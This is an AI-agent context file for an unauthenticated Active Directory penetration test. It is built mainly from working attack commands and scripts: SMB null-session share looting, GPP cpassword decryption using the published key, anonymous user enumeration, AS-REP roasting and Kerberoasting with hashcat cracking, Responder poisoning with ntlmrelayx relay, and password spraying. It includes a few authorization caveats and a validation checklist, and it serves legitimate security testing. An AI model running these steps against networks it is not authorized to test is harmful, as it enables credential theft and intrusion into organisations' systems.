Category: Pentest
Load this context by asking your agent: get the ad-pentest-unauthenticated context

Summary

An unauthenticated infrastructure pentest simulates an attacker with no credentials and no prior access, starting only from network reachability. The goal is to determine how far an attacker can get before obtaining any credentials, and whether AD misconfigurations allow privilege escalation from zero.
  • Phase 1–2 build a complete host and service map, identifying Domain Controllers via port fingerprinting
  • Phase 3–4 enumerate SMB shares via null and guest sessions, hunt for credentials in SYSVOL, GPP files, and accessible share contents
  • Phase 5 enumerates domain users, groups, and password policy without credentials via RPC null sessions and LDAP anonymous bind
  • Phase 6 performs AS-REP Roasting against accounts with Kerberos pre-auth disabled, producing offline-crackable hashes
  • Phase 7 performs Kerberoasting against SPN accounts using any credentials obtained in earlier phases
  • Phase 8 runs background attacks in parallel: Responder for NTLM hash capture, DNS zone transfer, NBT-NS enumeration
  • Phases 9–11 enforce a validation gate, false positive filter, and structured finding output

CONTEXT.md

When to Use This Context

Load this context when:
  • Starting a black-box or unauthenticated internal network pentest
  • The scope includes Active Directory and Windows infrastructure
  • No credentials have been provided (testing pre-auth attack surface)
  • Assessing SMB exposure, null sessions, and Kerberos pre-auth weaknesses
Key focus areas: host and port discovery, SMB null sessions, AD user enumeration, AS-REP Roasting, Kerberoasting, offline hash cracking.
Out of scope for this context: post-exploitation, lateral movement after credential gain, authenticated enumeration beyond initial foothold.
Typical flow: Discover → Enumerate SMB → Enumerate AD → Attack Kerberos → Crack → Report

Phase 1: Host Discovery

# ICMP sweep
nmap -sn -PE -T4 --min-parallelism 100 10.0.0.0/24 -oA discovery/ping_sweep

# ARP sweep (local subnet, requires root)
nmap -sn -PR 10.0.0.0/24 -oA discovery/arp_sweep

# TCP-based discovery (bypasses ICMP blocks)
nmap -sn -PS80,443,445,3389 10.0.0.0/24 -oA discovery/tcp_sweep

# Extract live hosts as the union of all three sweeps (a host that drops ICMP still shows up from the TCP sweep)
cat discovery/*_sweep.gnmap | grep "Status: Up" | awk '{print $2}' | sort -u > live_hosts.txt

# OS fingerprinting
nmap -O --osscan-guess -iL live_hosts.txt -T4 -oA discovery/os_guess
Windows hosts often block ICMP but respond to TCP 445. Always combine methods.

Phase 2: Port and Service Enumeration

# Full TCP scan all 65535 ports
nmap -sS -p- -T4 --min-rate 5000 -iL live_hosts.txt -oA scans/full_tcp

# Version + script scan on the union of open ports (paste avoids the trailing comma nmap rejects)
nmap -sV -sC -p "$(grep -oP '\d+/open' scans/full_tcp.gnmap | cut -d/ -f1 | sort -un | paste -sd, -)" \
 -iL live_hosts.txt -oA scans/services

# Extract hosts by service
grep "445/open" scans/full_tcp.gnmap | awk '{print $2}' > targets/smb_hosts.txt
grep "88/open"  scans/full_tcp.gnmap | awk '{print $2}' > targets/kerberos_hosts.txt
grep "389/open" scans/full_tcp.gnmap | awk '{print $2}' > targets/ldap_hosts.txt
grep "3389/open" scans/full_tcp.gnmap | awk '{print $2}' > targets/rdp_hosts.txt

# DC fingerprint: a DC exposes ALL of 53, 88, 389, 445 and 3268 (3268 = Global Catalog).
# --open lists hosts with ANY of these open (file servers, LDAP-enabled appliances), so keep only hosts showing all five.
nmap -p 53,88,389,445,3268 --open -iL live_hosts.txt -oA scans/dc_candidates
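Parsing the grepable output by hand is where the "all five ports" rule usually gets lost. The script below is an added example, not part of the original context: it merges live hosts across every sweep and then keeps only DC candidates that have every required port open, rather than any of them as `--open` reports. The `SAMPLE_*` strings are constructed stand-ins for the `.gnmap` files; in practice feed the real files on stdin.

```shell
#!/usr/bin/env bash
# Added example: parse nmap grepable (-oG) output to (a) union live hosts across
# every sweep and (b) keep only DC candidates with ALL required ports open.
# The three SAMPLE_* strings are constructed stand-ins for the .gnmap files.

SAMPLE_SWEEP_A='Host: 10.0.0.5 ()  Status: Up
Host: 10.0.0.9 ()  Status: Up'
SAMPLE_SWEEP_B='Host: 10.0.0.9 ()  Status: Up
Host: 10.0.0.20 ()  Status: Up'
SAMPLE_FULL='Host: 10.0.0.5 ()  Ports: 53/open/tcp//domain///, 88/open/tcp//kerberos-sec///, 389/open/tcp//ldap///, 445/open/tcp//microsoft-ds///, 3268/open/tcp//globalcatLDAP///  Ignored State: filtered (65530)
Host: 10.0.0.9 ()  Ports: 445/open/tcp//microsoft-ds///, 3389/open/tcp//ms-wbt-server///  Ignored State: closed (65533)
Host: 10.0.0.20 ()  Ports: 88/open/tcp//kerberos-sec///, 389/open/tcp//ldap///, 445/open/tcp//microsoft-ds///  Ignored State: filtered (65532)'

# Union of hosts reported Up (gnmap text on stdin). A host that dropped ICMP
# but answered the TCP sweep is still counted once.
live_hosts() {
  grep 'Status: Up' | awk '{print $2}' | sort -u
}

# Hosts with TCP port $1 open (gnmap text on stdin). The leading space stops
# "45/open" from matching inside "445/open".
hosts_with_port() {
  grep " $1/open/tcp" | awk '{print $2}' | sort -u
}

# DC candidates: hosts where EVERY port in the comma list $2 is open.
# nmap --open alone lists hosts with ANY of the ports open, which also
# catches file servers (445) and LDAP-enabled appliances (389).
dc_candidates() {
  local gnmap="$1" ports="${2:-53,88,389,445,3268}" ip p line ok
  printf '%s\n' "$gnmap" | grep '^Host: ' | awk '{print $2}' | sort -u |
  while read -r ip; do
    line=$(printf '%s\n' "$gnmap" | grep "^Host: $ip ")
    ok=1
    for p in $(printf '%s' "$ports" | tr ',' ' '); do
      printf '%s\n' "$line" | grep -q " $p/open/tcp" || { ok=0; break; }
    done
    [ "$ok" -eq 1 ] && printf '%s\n' "$ip"
  done
  return 0
}

# Stand-alone run against the constructed samples
printf '%s\n%s\n' "$SAMPLE_SWEEP_A" "$SAMPLE_SWEEP_B" | live_hosts
printf '%s\n' "$SAMPLE_FULL" | hosts_with_port 445
dc_candidates "$SAMPLE_FULL"
```

Against the sample, `dc_candidates` returns only 10.0.0.5; 10.0.0.20 has Kerberos and LDAP but no DNS or Global Catalog and is more likely a read-only replica, an LDAP appliance or a mis-scanned host, which is exactly the distinction `--open` on its own does not make. For the real files: `dc_candidates "$(cat scans/dc_candidates.gnmap)" > targets/dc_hosts.txt`.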

Phase 3: SMB Enumeration

# Test null session
nxc smb targets/smb_hosts.txt -u '' -p '' --shares 2>/dev/null | tee smb/null_shares.txt

# Test guest session
nxc smb targets/smb_hosts.txt -u 'guest' -p '' --shares 2>/dev/null | tee smb/guest_shares.txt

# Per-host smbclient check
while read ip; do
 echo "=== $ip ==="
 smbclient -N -L //$ip 2>/dev/null
done < targets/smb_hosts.txt | tee smb/smbclient_null.txt

# Access and download a readable share
smbclient -N //<IP>/ShareName -c 'prompt OFF; recurse ON; mget *' 2>/dev/null

# SYSVOL hunt for GPP cpassword values (look in Groups.xml, Services.xml, ScheduledTasks.xml, DataSources.xml, Drives.xml, Printers.xml)
smbclient -N //<DC-IP>/SYSVOL -c 'recurse ON; ls'
gpp-decrypt '<cpassword value>'
# cpassword is AES-256 under a key Microsoft published; MS14-025 stopped new ones being written, but old policy files persist.
High-priority share names: SYSVOL, NETLOGON, backup, backups, it, admin, scripts, tools
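To make clear why a found cpassword is a credential compromise and not merely a "sensitive file" finding, here is the decryption `gpp-decrypt` performs, written out with openssl. This is an added example, not code from the original context or from the gpp-decrypt tool. It assumes the password is ASCII (UTF-16LE NUL bytes are simply dropped) and that `openssl`, `base64` and `tr` are available. The sample cpassword is a widely circulated example value from a retired training lab, not data from any engagement.

```shell
#!/usr/bin/env bash
# Added example: the decryption gpp-decrypt performs, done with openssl so the
# weakness is visible. cpassword is AES-256-CBC with a zero IV under a static
# key Microsoft published (the reason MS14-025 removed the feature), base64 with
# the '=' padding stripped, plaintext in UTF-16LE. The sample cpassword is a
# widely documented example value from a retired training lab, not client data.
GPP_AES_KEY=4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b
SAMPLE_CPASSWORD='edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'

gpp_decrypt() {
  local cp="$1"
  # restore the base64 '=' padding that GPP strips
  while [ $(( ${#cp} % 4 )) -ne 0 ]; do cp="${cp}="; done
  # openssl removes the PKCS#7 padding; dropping NUL bytes turns UTF-16LE into
  # ASCII (assumption: the password contains no non-ASCII characters)
  printf '%s' "$cp" | base64 -d \
    | openssl enc -d -aes-256-cbc -K "$GPP_AES_KEY" -iv 00000000000000000000000000000000 \
    | tr -d '\0'
}

# Walk a downloaded SYSVOL tree (e.g. smbclient mget output), decrypt every
# cpassword and print "file<TAB>password". cpassword="" means no password stored.
hunt_gpp() {
  local dir="$1" f cp
  grep -rl --include='*.xml' 'cpassword=' "$dir" 2>/dev/null | while read -r f; do
    grep -o 'cpassword="[^"]*"' "$f" | cut -d'"' -f2 | while read -r cp; do
      [ -n "$cp" ] || continue
      printf '%s\t%s\n' "$f" "$(gpp_decrypt "$cp")"
    done
  done
  return 0
}

# Stand-alone run against the documented sample value
gpp_decrypt "$SAMPLE_CPASSWORD"; echo
```

After `smbclient -N //<DC-IP>/SYSVOL -c 'prompt OFF; recurse ON; mget *'` into a working directory, `hunt_gpp ./SYSVOL` lists every file that still carries a stored password together with the plaintext. Keep the file path: the XML also names the account (`userName=`) the password belongs to, which is what the finding needs.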
# Check for EternalBlue (MS17-010), detection only; never run the exploit without explicit written approval
nmap -p 445 --script smb-vuln-ms17-010 -iL targets/smb_hosts.txt

# Check SMB signing: --gen-relay-list writes the hosts where signing is not required, i.e. the NTLM relay targets
nxc smb targets/smb_hosts.txt --gen-relay-list smb/relay_candidates.txt

Phase 4: SMB Share Content Analysis

# Credential patterns (run from the directory holding the downloaded share contents; -I skips binaries)
grep -rIiE "password\s*=|pwd\s*=|connectionstring" . 2>/dev/null
grep -rIoE "AKIA[0-9A-Z]{16}" . 2>/dev/null
grep -rIlE "-----BEGIN (RSA |EC |OPENSSH )?PRIVATE KEY-----" . 2>/dev/null

# PowerShell scripts (--include instead of **/*.ps1, which needs bash globstar and otherwise matches only one level deep)
grep -riE --include='*.ps1' "ConvertTo-SecureString|password|credential" . 2>/dev/null

# web.config ASP.NET connection strings, wherever they sit in the tree
grep -riE --include='web.config' "connectionString|password|pwd" . 2>/dev/null
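Share dumps are often thousands of files, and a pile of untagged grep output is hard to turn into findings. The scanner below is an added example, not from the original context: it runs a named pattern set over a directory, skips binaries, and prefixes each hit with the pattern that fired so the output can be sorted and triaged. The pattern set is illustrative and should be extended per engagement; the test files are constructed, and the AWS key is Amazon's documented placeholder key.

```shell
#!/usr/bin/env bash
# Added example: tagged secrets scan over downloaded share contents. Uses
# grep --include/-r instead of "**/*.ps1" (which needs bash globstar), skips
# binaries (-I) and labels each hit with the pattern name. The pattern set is
# an illustrative assumption; add engagement-specific ones.
scan_secrets() {
  local dir="$1" name re
  # name;ERE  (';' as separator because the regexes contain '|' and ':')
  local patterns='password_assign;(password|passwd|pwd)[[:space:]]*=
connection_string;connectionString=
aws_access_key;AKIA[0-9A-Z]{16}
private_key;-----BEGIN ([A-Z ]+ )?PRIVATE KEY-----
ps_securestring;ConvertTo-SecureString'
  printf '%s\n' "$patterns" | while IFS=';' read -r name re; do
    grep -rIinE --exclude-dir='.git' "$re" "$dir" 2>/dev/null |
      while IFS= read -r hit; do printf '%s\t%s\n' "$name" "$hit"; done
  done
  return 0
}

# Narrow pass over the file types that carry credentials most often
scan_scripts() {
  local dir="$1"
  grep -rIinE --include='*.ps1' --include='web.config' \
    'ConvertTo-SecureString|connectionString|password|credential' "$dir" 2>/dev/null
  return 0
}
```

Typical use is `scan_secrets ./shares | sort > smb/secret_hits.tsv`; the first column groups hits by type, and the `file:line:content` remainder is the evidence line the validation gate asks for. Every hit still has to be confirmed by authenticating with the credential before it is reported as a compromise.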

Phase 5: AD Enumeration (Unauthenticated)

# enum4linux-ng (modern, best output)
enum4linux-ng -A <DC-IP> -oA enum4linux/dc_full

# rpcclient null session
rpcclient -U "" -N <DC-IP>
# inside: enumdomusers / enumdomgroups / getdompwinfo

# LDAP anonymous bind dump users
ldapsearch -x -H ldap://<DC-IP> \
 -b "DC=domain,DC=local" \
 "(objectClass=user)" sAMAccountName userPrincipalName memberOf \
 2>/dev/null | tee ldap/users_anon.txt

grep "sAMAccountName:" ldap/users_anon.txt | awk '{print $2}' > targets/userlist.txt
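The `grep | awk` extraction above silently loses two kinds of entries: ldapsearch folds lines longer than 76 characters onto a continuation line that starts with a single space, and it base64-encodes any value containing non-ASCII bytes using `::` instead of `:`. The following is an added example, not code from the original context, that unfolds the LDIF and decodes base64 values before extracting an attribute; `SAMPLE_LDIF` is constructed to show both cases.

```shell
#!/usr/bin/env bash
# Added example: pull attribute values out of ldapsearch output the way LDIF
# actually encodes them. Continuation lines start with one space and are
# appended verbatim; values written as "attr:: <base64>" must be decoded.
# A plain grep/awk on "sAMAccountName:" truncates the first and skips the
# second. SAMPLE_LDIF is constructed.
SAMPLE_LDIF='dn: CN=Svc Backup,OU=Service Accounts,DC=domain,DC=local
sAMAccountName: svc_backup
userPrincipalName: svc_backup@domain.local
memberOf: CN=Backup Operators,CN=Builtin,DC=domain,DC=local

dn: CN=Juan Muñoz,OU=Users,DC=domain,DC=local
sAMAccountName:: anVhbi5tdcOxb3o=
userPrincipalName: juan.munoz@domain.local

dn: CN=Long Name,OU=Users,DC=domain,DC=local
sAMAccountName: administrator.long.nam
 e.wrapped
userPrincipalName: administrator.long.name.wrapped@domain.local'

# Join folded continuation lines back onto their attribute line (stdin -> stdout)
ldif_unfold() {
  awk '
    /^ / { buf = buf substr($0, 2); next }
    { if (buf != "") print buf; buf = $0 }
    END  { if (buf != "") print buf }'
}

# Print every value of attribute $1, decoding "attr:: <base64>" values
ldif_attr() {
  local attr="$1" line
  ldif_unfold | while IFS= read -r line; do
    case "$line" in
      "$attr:: "*) printf '%s' "${line#"$attr:: "}" | base64 -d; printf '\n' ;;
      "$attr: "*)  printf '%s\n' "${line#"$attr: "}" ;;
    esac
  done
  return 0
}

# Stand-alone run against the constructed sample
printf '%s\n' "$SAMPLE_LDIF" | ldif_attr sAMAccountName
```

Use it as `ldif_attr sAMAccountName < ldap/users_anon.txt > targets/userlist.txt`; the same function with `memberOf` or `servicePrincipalName` gives group membership and SPN lists from the same anonymous dump without another query.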

# Kerbrute validates usernames via Kerberos pre-auth probing: no lockout risk, but every probe logs a Kerberos event on the DC
kerbrute userenum --dc <DC-IP> -d domain.local \
 /usr/share/wordlists/usernames.txt -o kerbrute/valid_users.txt

Phase 6: AS-REP Roasting

# No credentials needed
GetNPUsers.py domain.local/ \
 -usersfile targets/userlist.txt \
 -no-pass -dc-ip <DC-IP> \
 -outputfile asrep/hashes.txt -format hashcat

# Crack offline hashcat mode 18200
hashcat -m 18200 asrep/hashes.txt /usr/share/wordlists/rockyou.txt \
 --rules-file /usr/share/hashcat/rules/best64.rule \
 -o asrep/cracked.txt
Accounts with DONT_REQUIRE_PREAUTH set in userAccountControl are vulnerable. Often misconfigured service accounts or legacy accounts.

Phase 7: Kerberoasting

Requires at least one valid domain credential (from SMB analysis, GPP decrypt, or AS-REP cracking).
# Request TGS for all SPN accounts
GetUserSPNs.py domain.local/username:password \
 -dc-ip <DC-IP> -request \
 -outputfile kerberoast/tgs_hashes.txt

# Crack offline mode 13100 (RC4), 19600 (AES128), 19700 (AES256)
hashcat -m 13100 kerberoast/tgs_hashes.txt /usr/share/wordlists/rockyou.txt \
 --rules-file /usr/share/hashcat/rules/best64.rule \
 -o kerberoast/cracked.txt
AES256 (etype 18) hashes crack significantly slower than RC4 (etype 23).
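Two things go wrong between roasting and cracking: hashes of different encryption types end up in the same file and have to be split across the four hashcat modes, and the validation gate requires every roasted account to be in scope. The script below is an added example, not from the original context, that routes each AS-REP or TGS hash to its mode from the prefix, drops out-of-scope accounts, and writes one input file per mode. The hashes are constructed placeholders with dummy hex, not real roasting output.

```shell
#!/usr/bin/env bash
# Added example: triage AS-REP and TGS hashes before cracking. Routes each line
# to the right hashcat mode from its etype prefix and drops accounts that are
# not on the scope list. The hashes below are constructed placeholders with
# dummy hex, not real output.
SAMPLE_HASHES='$krb5asrep$23$svc_legacy@DOMAIN.LOCAL:0123456789abcdef0123456789abcdef$00112233
$krb5tgs$23$*svc_sql$DOMAIN.LOCAL$MSSQLSvc/sql01.domain.local:1433*$0123456789abcdef0123456789abcdef$aabbccdd
$krb5tgs$18$svc_web$DOMAIN.LOCAL$*HTTP/web01.domain.local*$0123456789abcdef01234567$aabbccdd
$krb5tgs$23$*contractor_x$DOMAIN.LOCAL$cifs/old.domain.local*$0123456789abcdef0123456789abcdef$aabbccdd'

# hashcat mode from the hash prefix: 18200 AS-REP RC4, 13100 TGS RC4,
# 19600 TGS AES128 (etype 17), 19700 TGS AES256 (etype 18)
hash_mode() {
  case "$1" in
    '$krb5asrep$23$'*) echo 18200 ;;
    '$krb5tgs$23$'*)   echo 13100 ;;
    '$krb5tgs$17$'*)   echo 19600 ;;
    '$krb5tgs$18$'*)   echo 19700 ;;
    *) return 1 ;;
  esac
}

# sAMAccountName (lowercased) from any of the four formats: it is the 4th
# '$'-separated field, with a leading '*' in the RC4 TGS format and an
# '@REALM:...' suffix in the AS-REP format
hash_user() {
  printf '%s\n' "$1" | cut -d'$' -f4 | cut -d@ -f1 | sed 's/^\*//' | tr 'A-Z' 'a-z'
}

# stdin: hash lines; $1: scope file (one account name per line, any case)
# stdout: mode<TAB>user<TAB>hash for in-scope accounts; skips go to stderr
triage_hashes() {
  local scope="$1" line mode user
  while IFS= read -r line; do
    [ -n "$line" ] || continue
    mode=$(hash_mode "$line") || { printf 'skip (unknown format): %.40s\n' "$line" >&2; continue; }
    user=$(hash_user "$line")
    if grep -qix -- "$user" "$scope"; then
      printf '%s\t%s\t%s\n' "$mode" "$user" "$line"
    else
      printf 'skip (out of scope): %s\n' "$user" >&2
    fi
  done
  return 0
}

# Split triaged lines into one hashcat input file per mode under directory $1
split_by_mode() {
  mkdir -p "$1"
  awk -F'\t' -v d="$1" '{ print $3 > (d "/mode_" $1 ".txt") }'
}
```

Typical use: `cat asrep/hashes.txt kerberoast/tgs_hashes.txt | triage_hashes scope/accounts.txt | split_by_mode crack/`, then one hashcat run per `crack/mode_<N>.txt` with `-m <N>`. Crack the 13100 file first; the AES files only get GPU time once RC4 is exhausted.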

Phase 8: Background and Supplementary Attacks

Responder NTLM Hash Capture

Start at engagement launch and leave running throughout. Peak capture windows: morning logon (08:00–09:30) and post-lunch (13:00–14:00).
# Run in a tmux session so it survives the shell: -w starts the rogue WPAD proxy, -P forces auth on wpad.dat retrieval
tmux new-session -d -s responder \
 "responder -I eth0 -wP 2>&1 | tee responder/logs/responder.log"

# Monitor captured hashes
tail -f /usr/share/responder/logs/SMB-NTLMv2-*.txt

# Crack NTLMv2 hashes mode 5600 (all_ntlmv2.txt = the merged, de-duplicated Responder *-NTLMv2-*.txt capture files)
hashcat -m 5600 responder/hashes/all_ntlmv2.txt /usr/share/wordlists/rockyou.txt \
 -o responder/cracked.txt
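Responder writes one capture file per client and logs every authentication attempt, so the same user shows up many times under different server challenges, and machine accounts (`HOST$`) appear alongside users. Feeding all of that to hashcat wastes GPU time on duplicates and on passwords that will never crack. The following is an added example, not code from the original context or from Responder, that merges the capture files into a single hashcat input; the log directory is the default Kali path and is an assumption, and `SAMPLE_CAPTURES` is constructed.

```shell
#!/usr/bin/env bash
# Added example: merge Responder's per-client NTLMv2 capture files into one
# hashcat input. Keeps one hash per DOMAIN\user and drops machine accounts,
# whose passwords are long and random and do not crack. SAMPLE_CAPTURES is
# constructed; RESPONDER_LOGS is the default Kali path (assumption).
RESPONDER_LOGS=/usr/share/responder/logs

SAMPLE_CAPTURES='jsmith::DOMAIN:1122334455667788:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:0101000000000000
JSMITH::domain:8877665544332211:bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb:0101000000000000
WS01$::DOMAIN:1122334455667788:cccccccccccccccccccccccccccccccc:0101000000000000
mlee::DOMAIN:1122334455667788:dddddddddddddddddddddddddddddddd:0101000000000000'

# Concatenate every SMB/HTTP NTLMv2 capture file Responder wrote
responder_captures() {
  cat "$RESPONDER_LOGS"/*-NTLMv2-*.txt 2>/dev/null
  return 0
}

# Format: user::DOMAIN:serverchallenge:ntproofstr:blob  (6 ':'-separated fields)
# Keep the first hash seen per DOMAIN\user, case-insensitively.
ntlmv2_dedupe() {
  awk -F: 'NF >= 6 { key = tolower($3 "\\" $1); if (!(key in seen)) { seen[key] = 1; print } }'
}

# Drop machine accounts (sAMAccountName ends in $)
ntlmv2_crackable() {
  awk -F: 'NF >= 6 && $1 !~ /\$$/'
}

# Distinct accounts captured per domain, for the status report
ntlmv2_summary() {
  awk -F: 'NF >= 6 { key = tolower($3 "\\" $1); if (!(key in seen)) { seen[key] = 1; n[tolower($3)]++ } }
           END { for (d in n) printf "%s\t%d\n", d, n[d] }'
}

# Stand-alone run against the constructed sample
printf '%s\n' "$SAMPLE_CAPTURES" | ntlmv2_dedupe | ntlmv2_crackable
```

On an engagement: `responder_captures | ntlmv2_dedupe | ntlmv2_crackable > responder/hashes/all_ntlmv2.txt` before the hashcat run above. Keep the machine-account lines separately; they are useless for cracking but are still relay material in the next step.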
Relay instead of crack (only against hosts where SMB signing is not required, i.e. the --gen-relay-list output from Phase 3):
# Set SMB = Off and HTTP = Off in Responder.conf so ntlmrelayx.py can bind 445/80 itself, then:
ntlmrelayx.py -tf smb/relay_candidates.txt -smb2support
Note: -d (DHCP poisoning) can disrupt the entire subnet. Confirm explicit client approval before using it.

Other Checks

# DNS zone transfer
dig axfr @<DC-IP> domain.local 2>/dev/null

# Password spray: ONE password per round, and read the lockout threshold and observation window first (enum4linux-ng -P <DC-IP>).
# Spray at a single DC, not smb_hosts.txt: every member host forwards the logon to a DC, so N hosts = N failed attempts per user per round.
nxc smb <DC-IP> -u targets/userlist.txt \
 -p 'Winter2024!' --continue-on-success 2>/dev/null

Validation Gate

Before reporting any finding, confirm all of the following:
  • Reproduced in a clean session with no cached credentials
  • Null/guest session confirmed explicitly, not assumed from tool output
  • Cracked hashes verified by re-authenticating with the cracked credential
  • AS-REP / Kerberoast hashes are from accounts in scope
  • SMB file access confirmed by actually reading a file, not just listing the share
  • Impact articulated: what can an attacker specifically do with this finding?
  • Evidence captured: full command, output, timestamp, source IP

False Positive Filter

Do not report without further verification:
  • Share listed but not accessible: listing a share name is not the same as read access, always confirm by reading a file
  • EternalBlue flagged by Nmap but unconfirmed: the smb-vuln-ms17-010 script has false positive cases, confirm before reporting as exploitable
  • Hash captured but not cracked: an uncracked AS-REP or TGS hash is a misconfiguration finding, not a credential compromise
  • LDAP anonymous bind returning empty results: a successful bind with 0 results is not the same as useful enumeration
  • Password spray without confirmed lockout policy: do not spray without knowing the lockout threshold
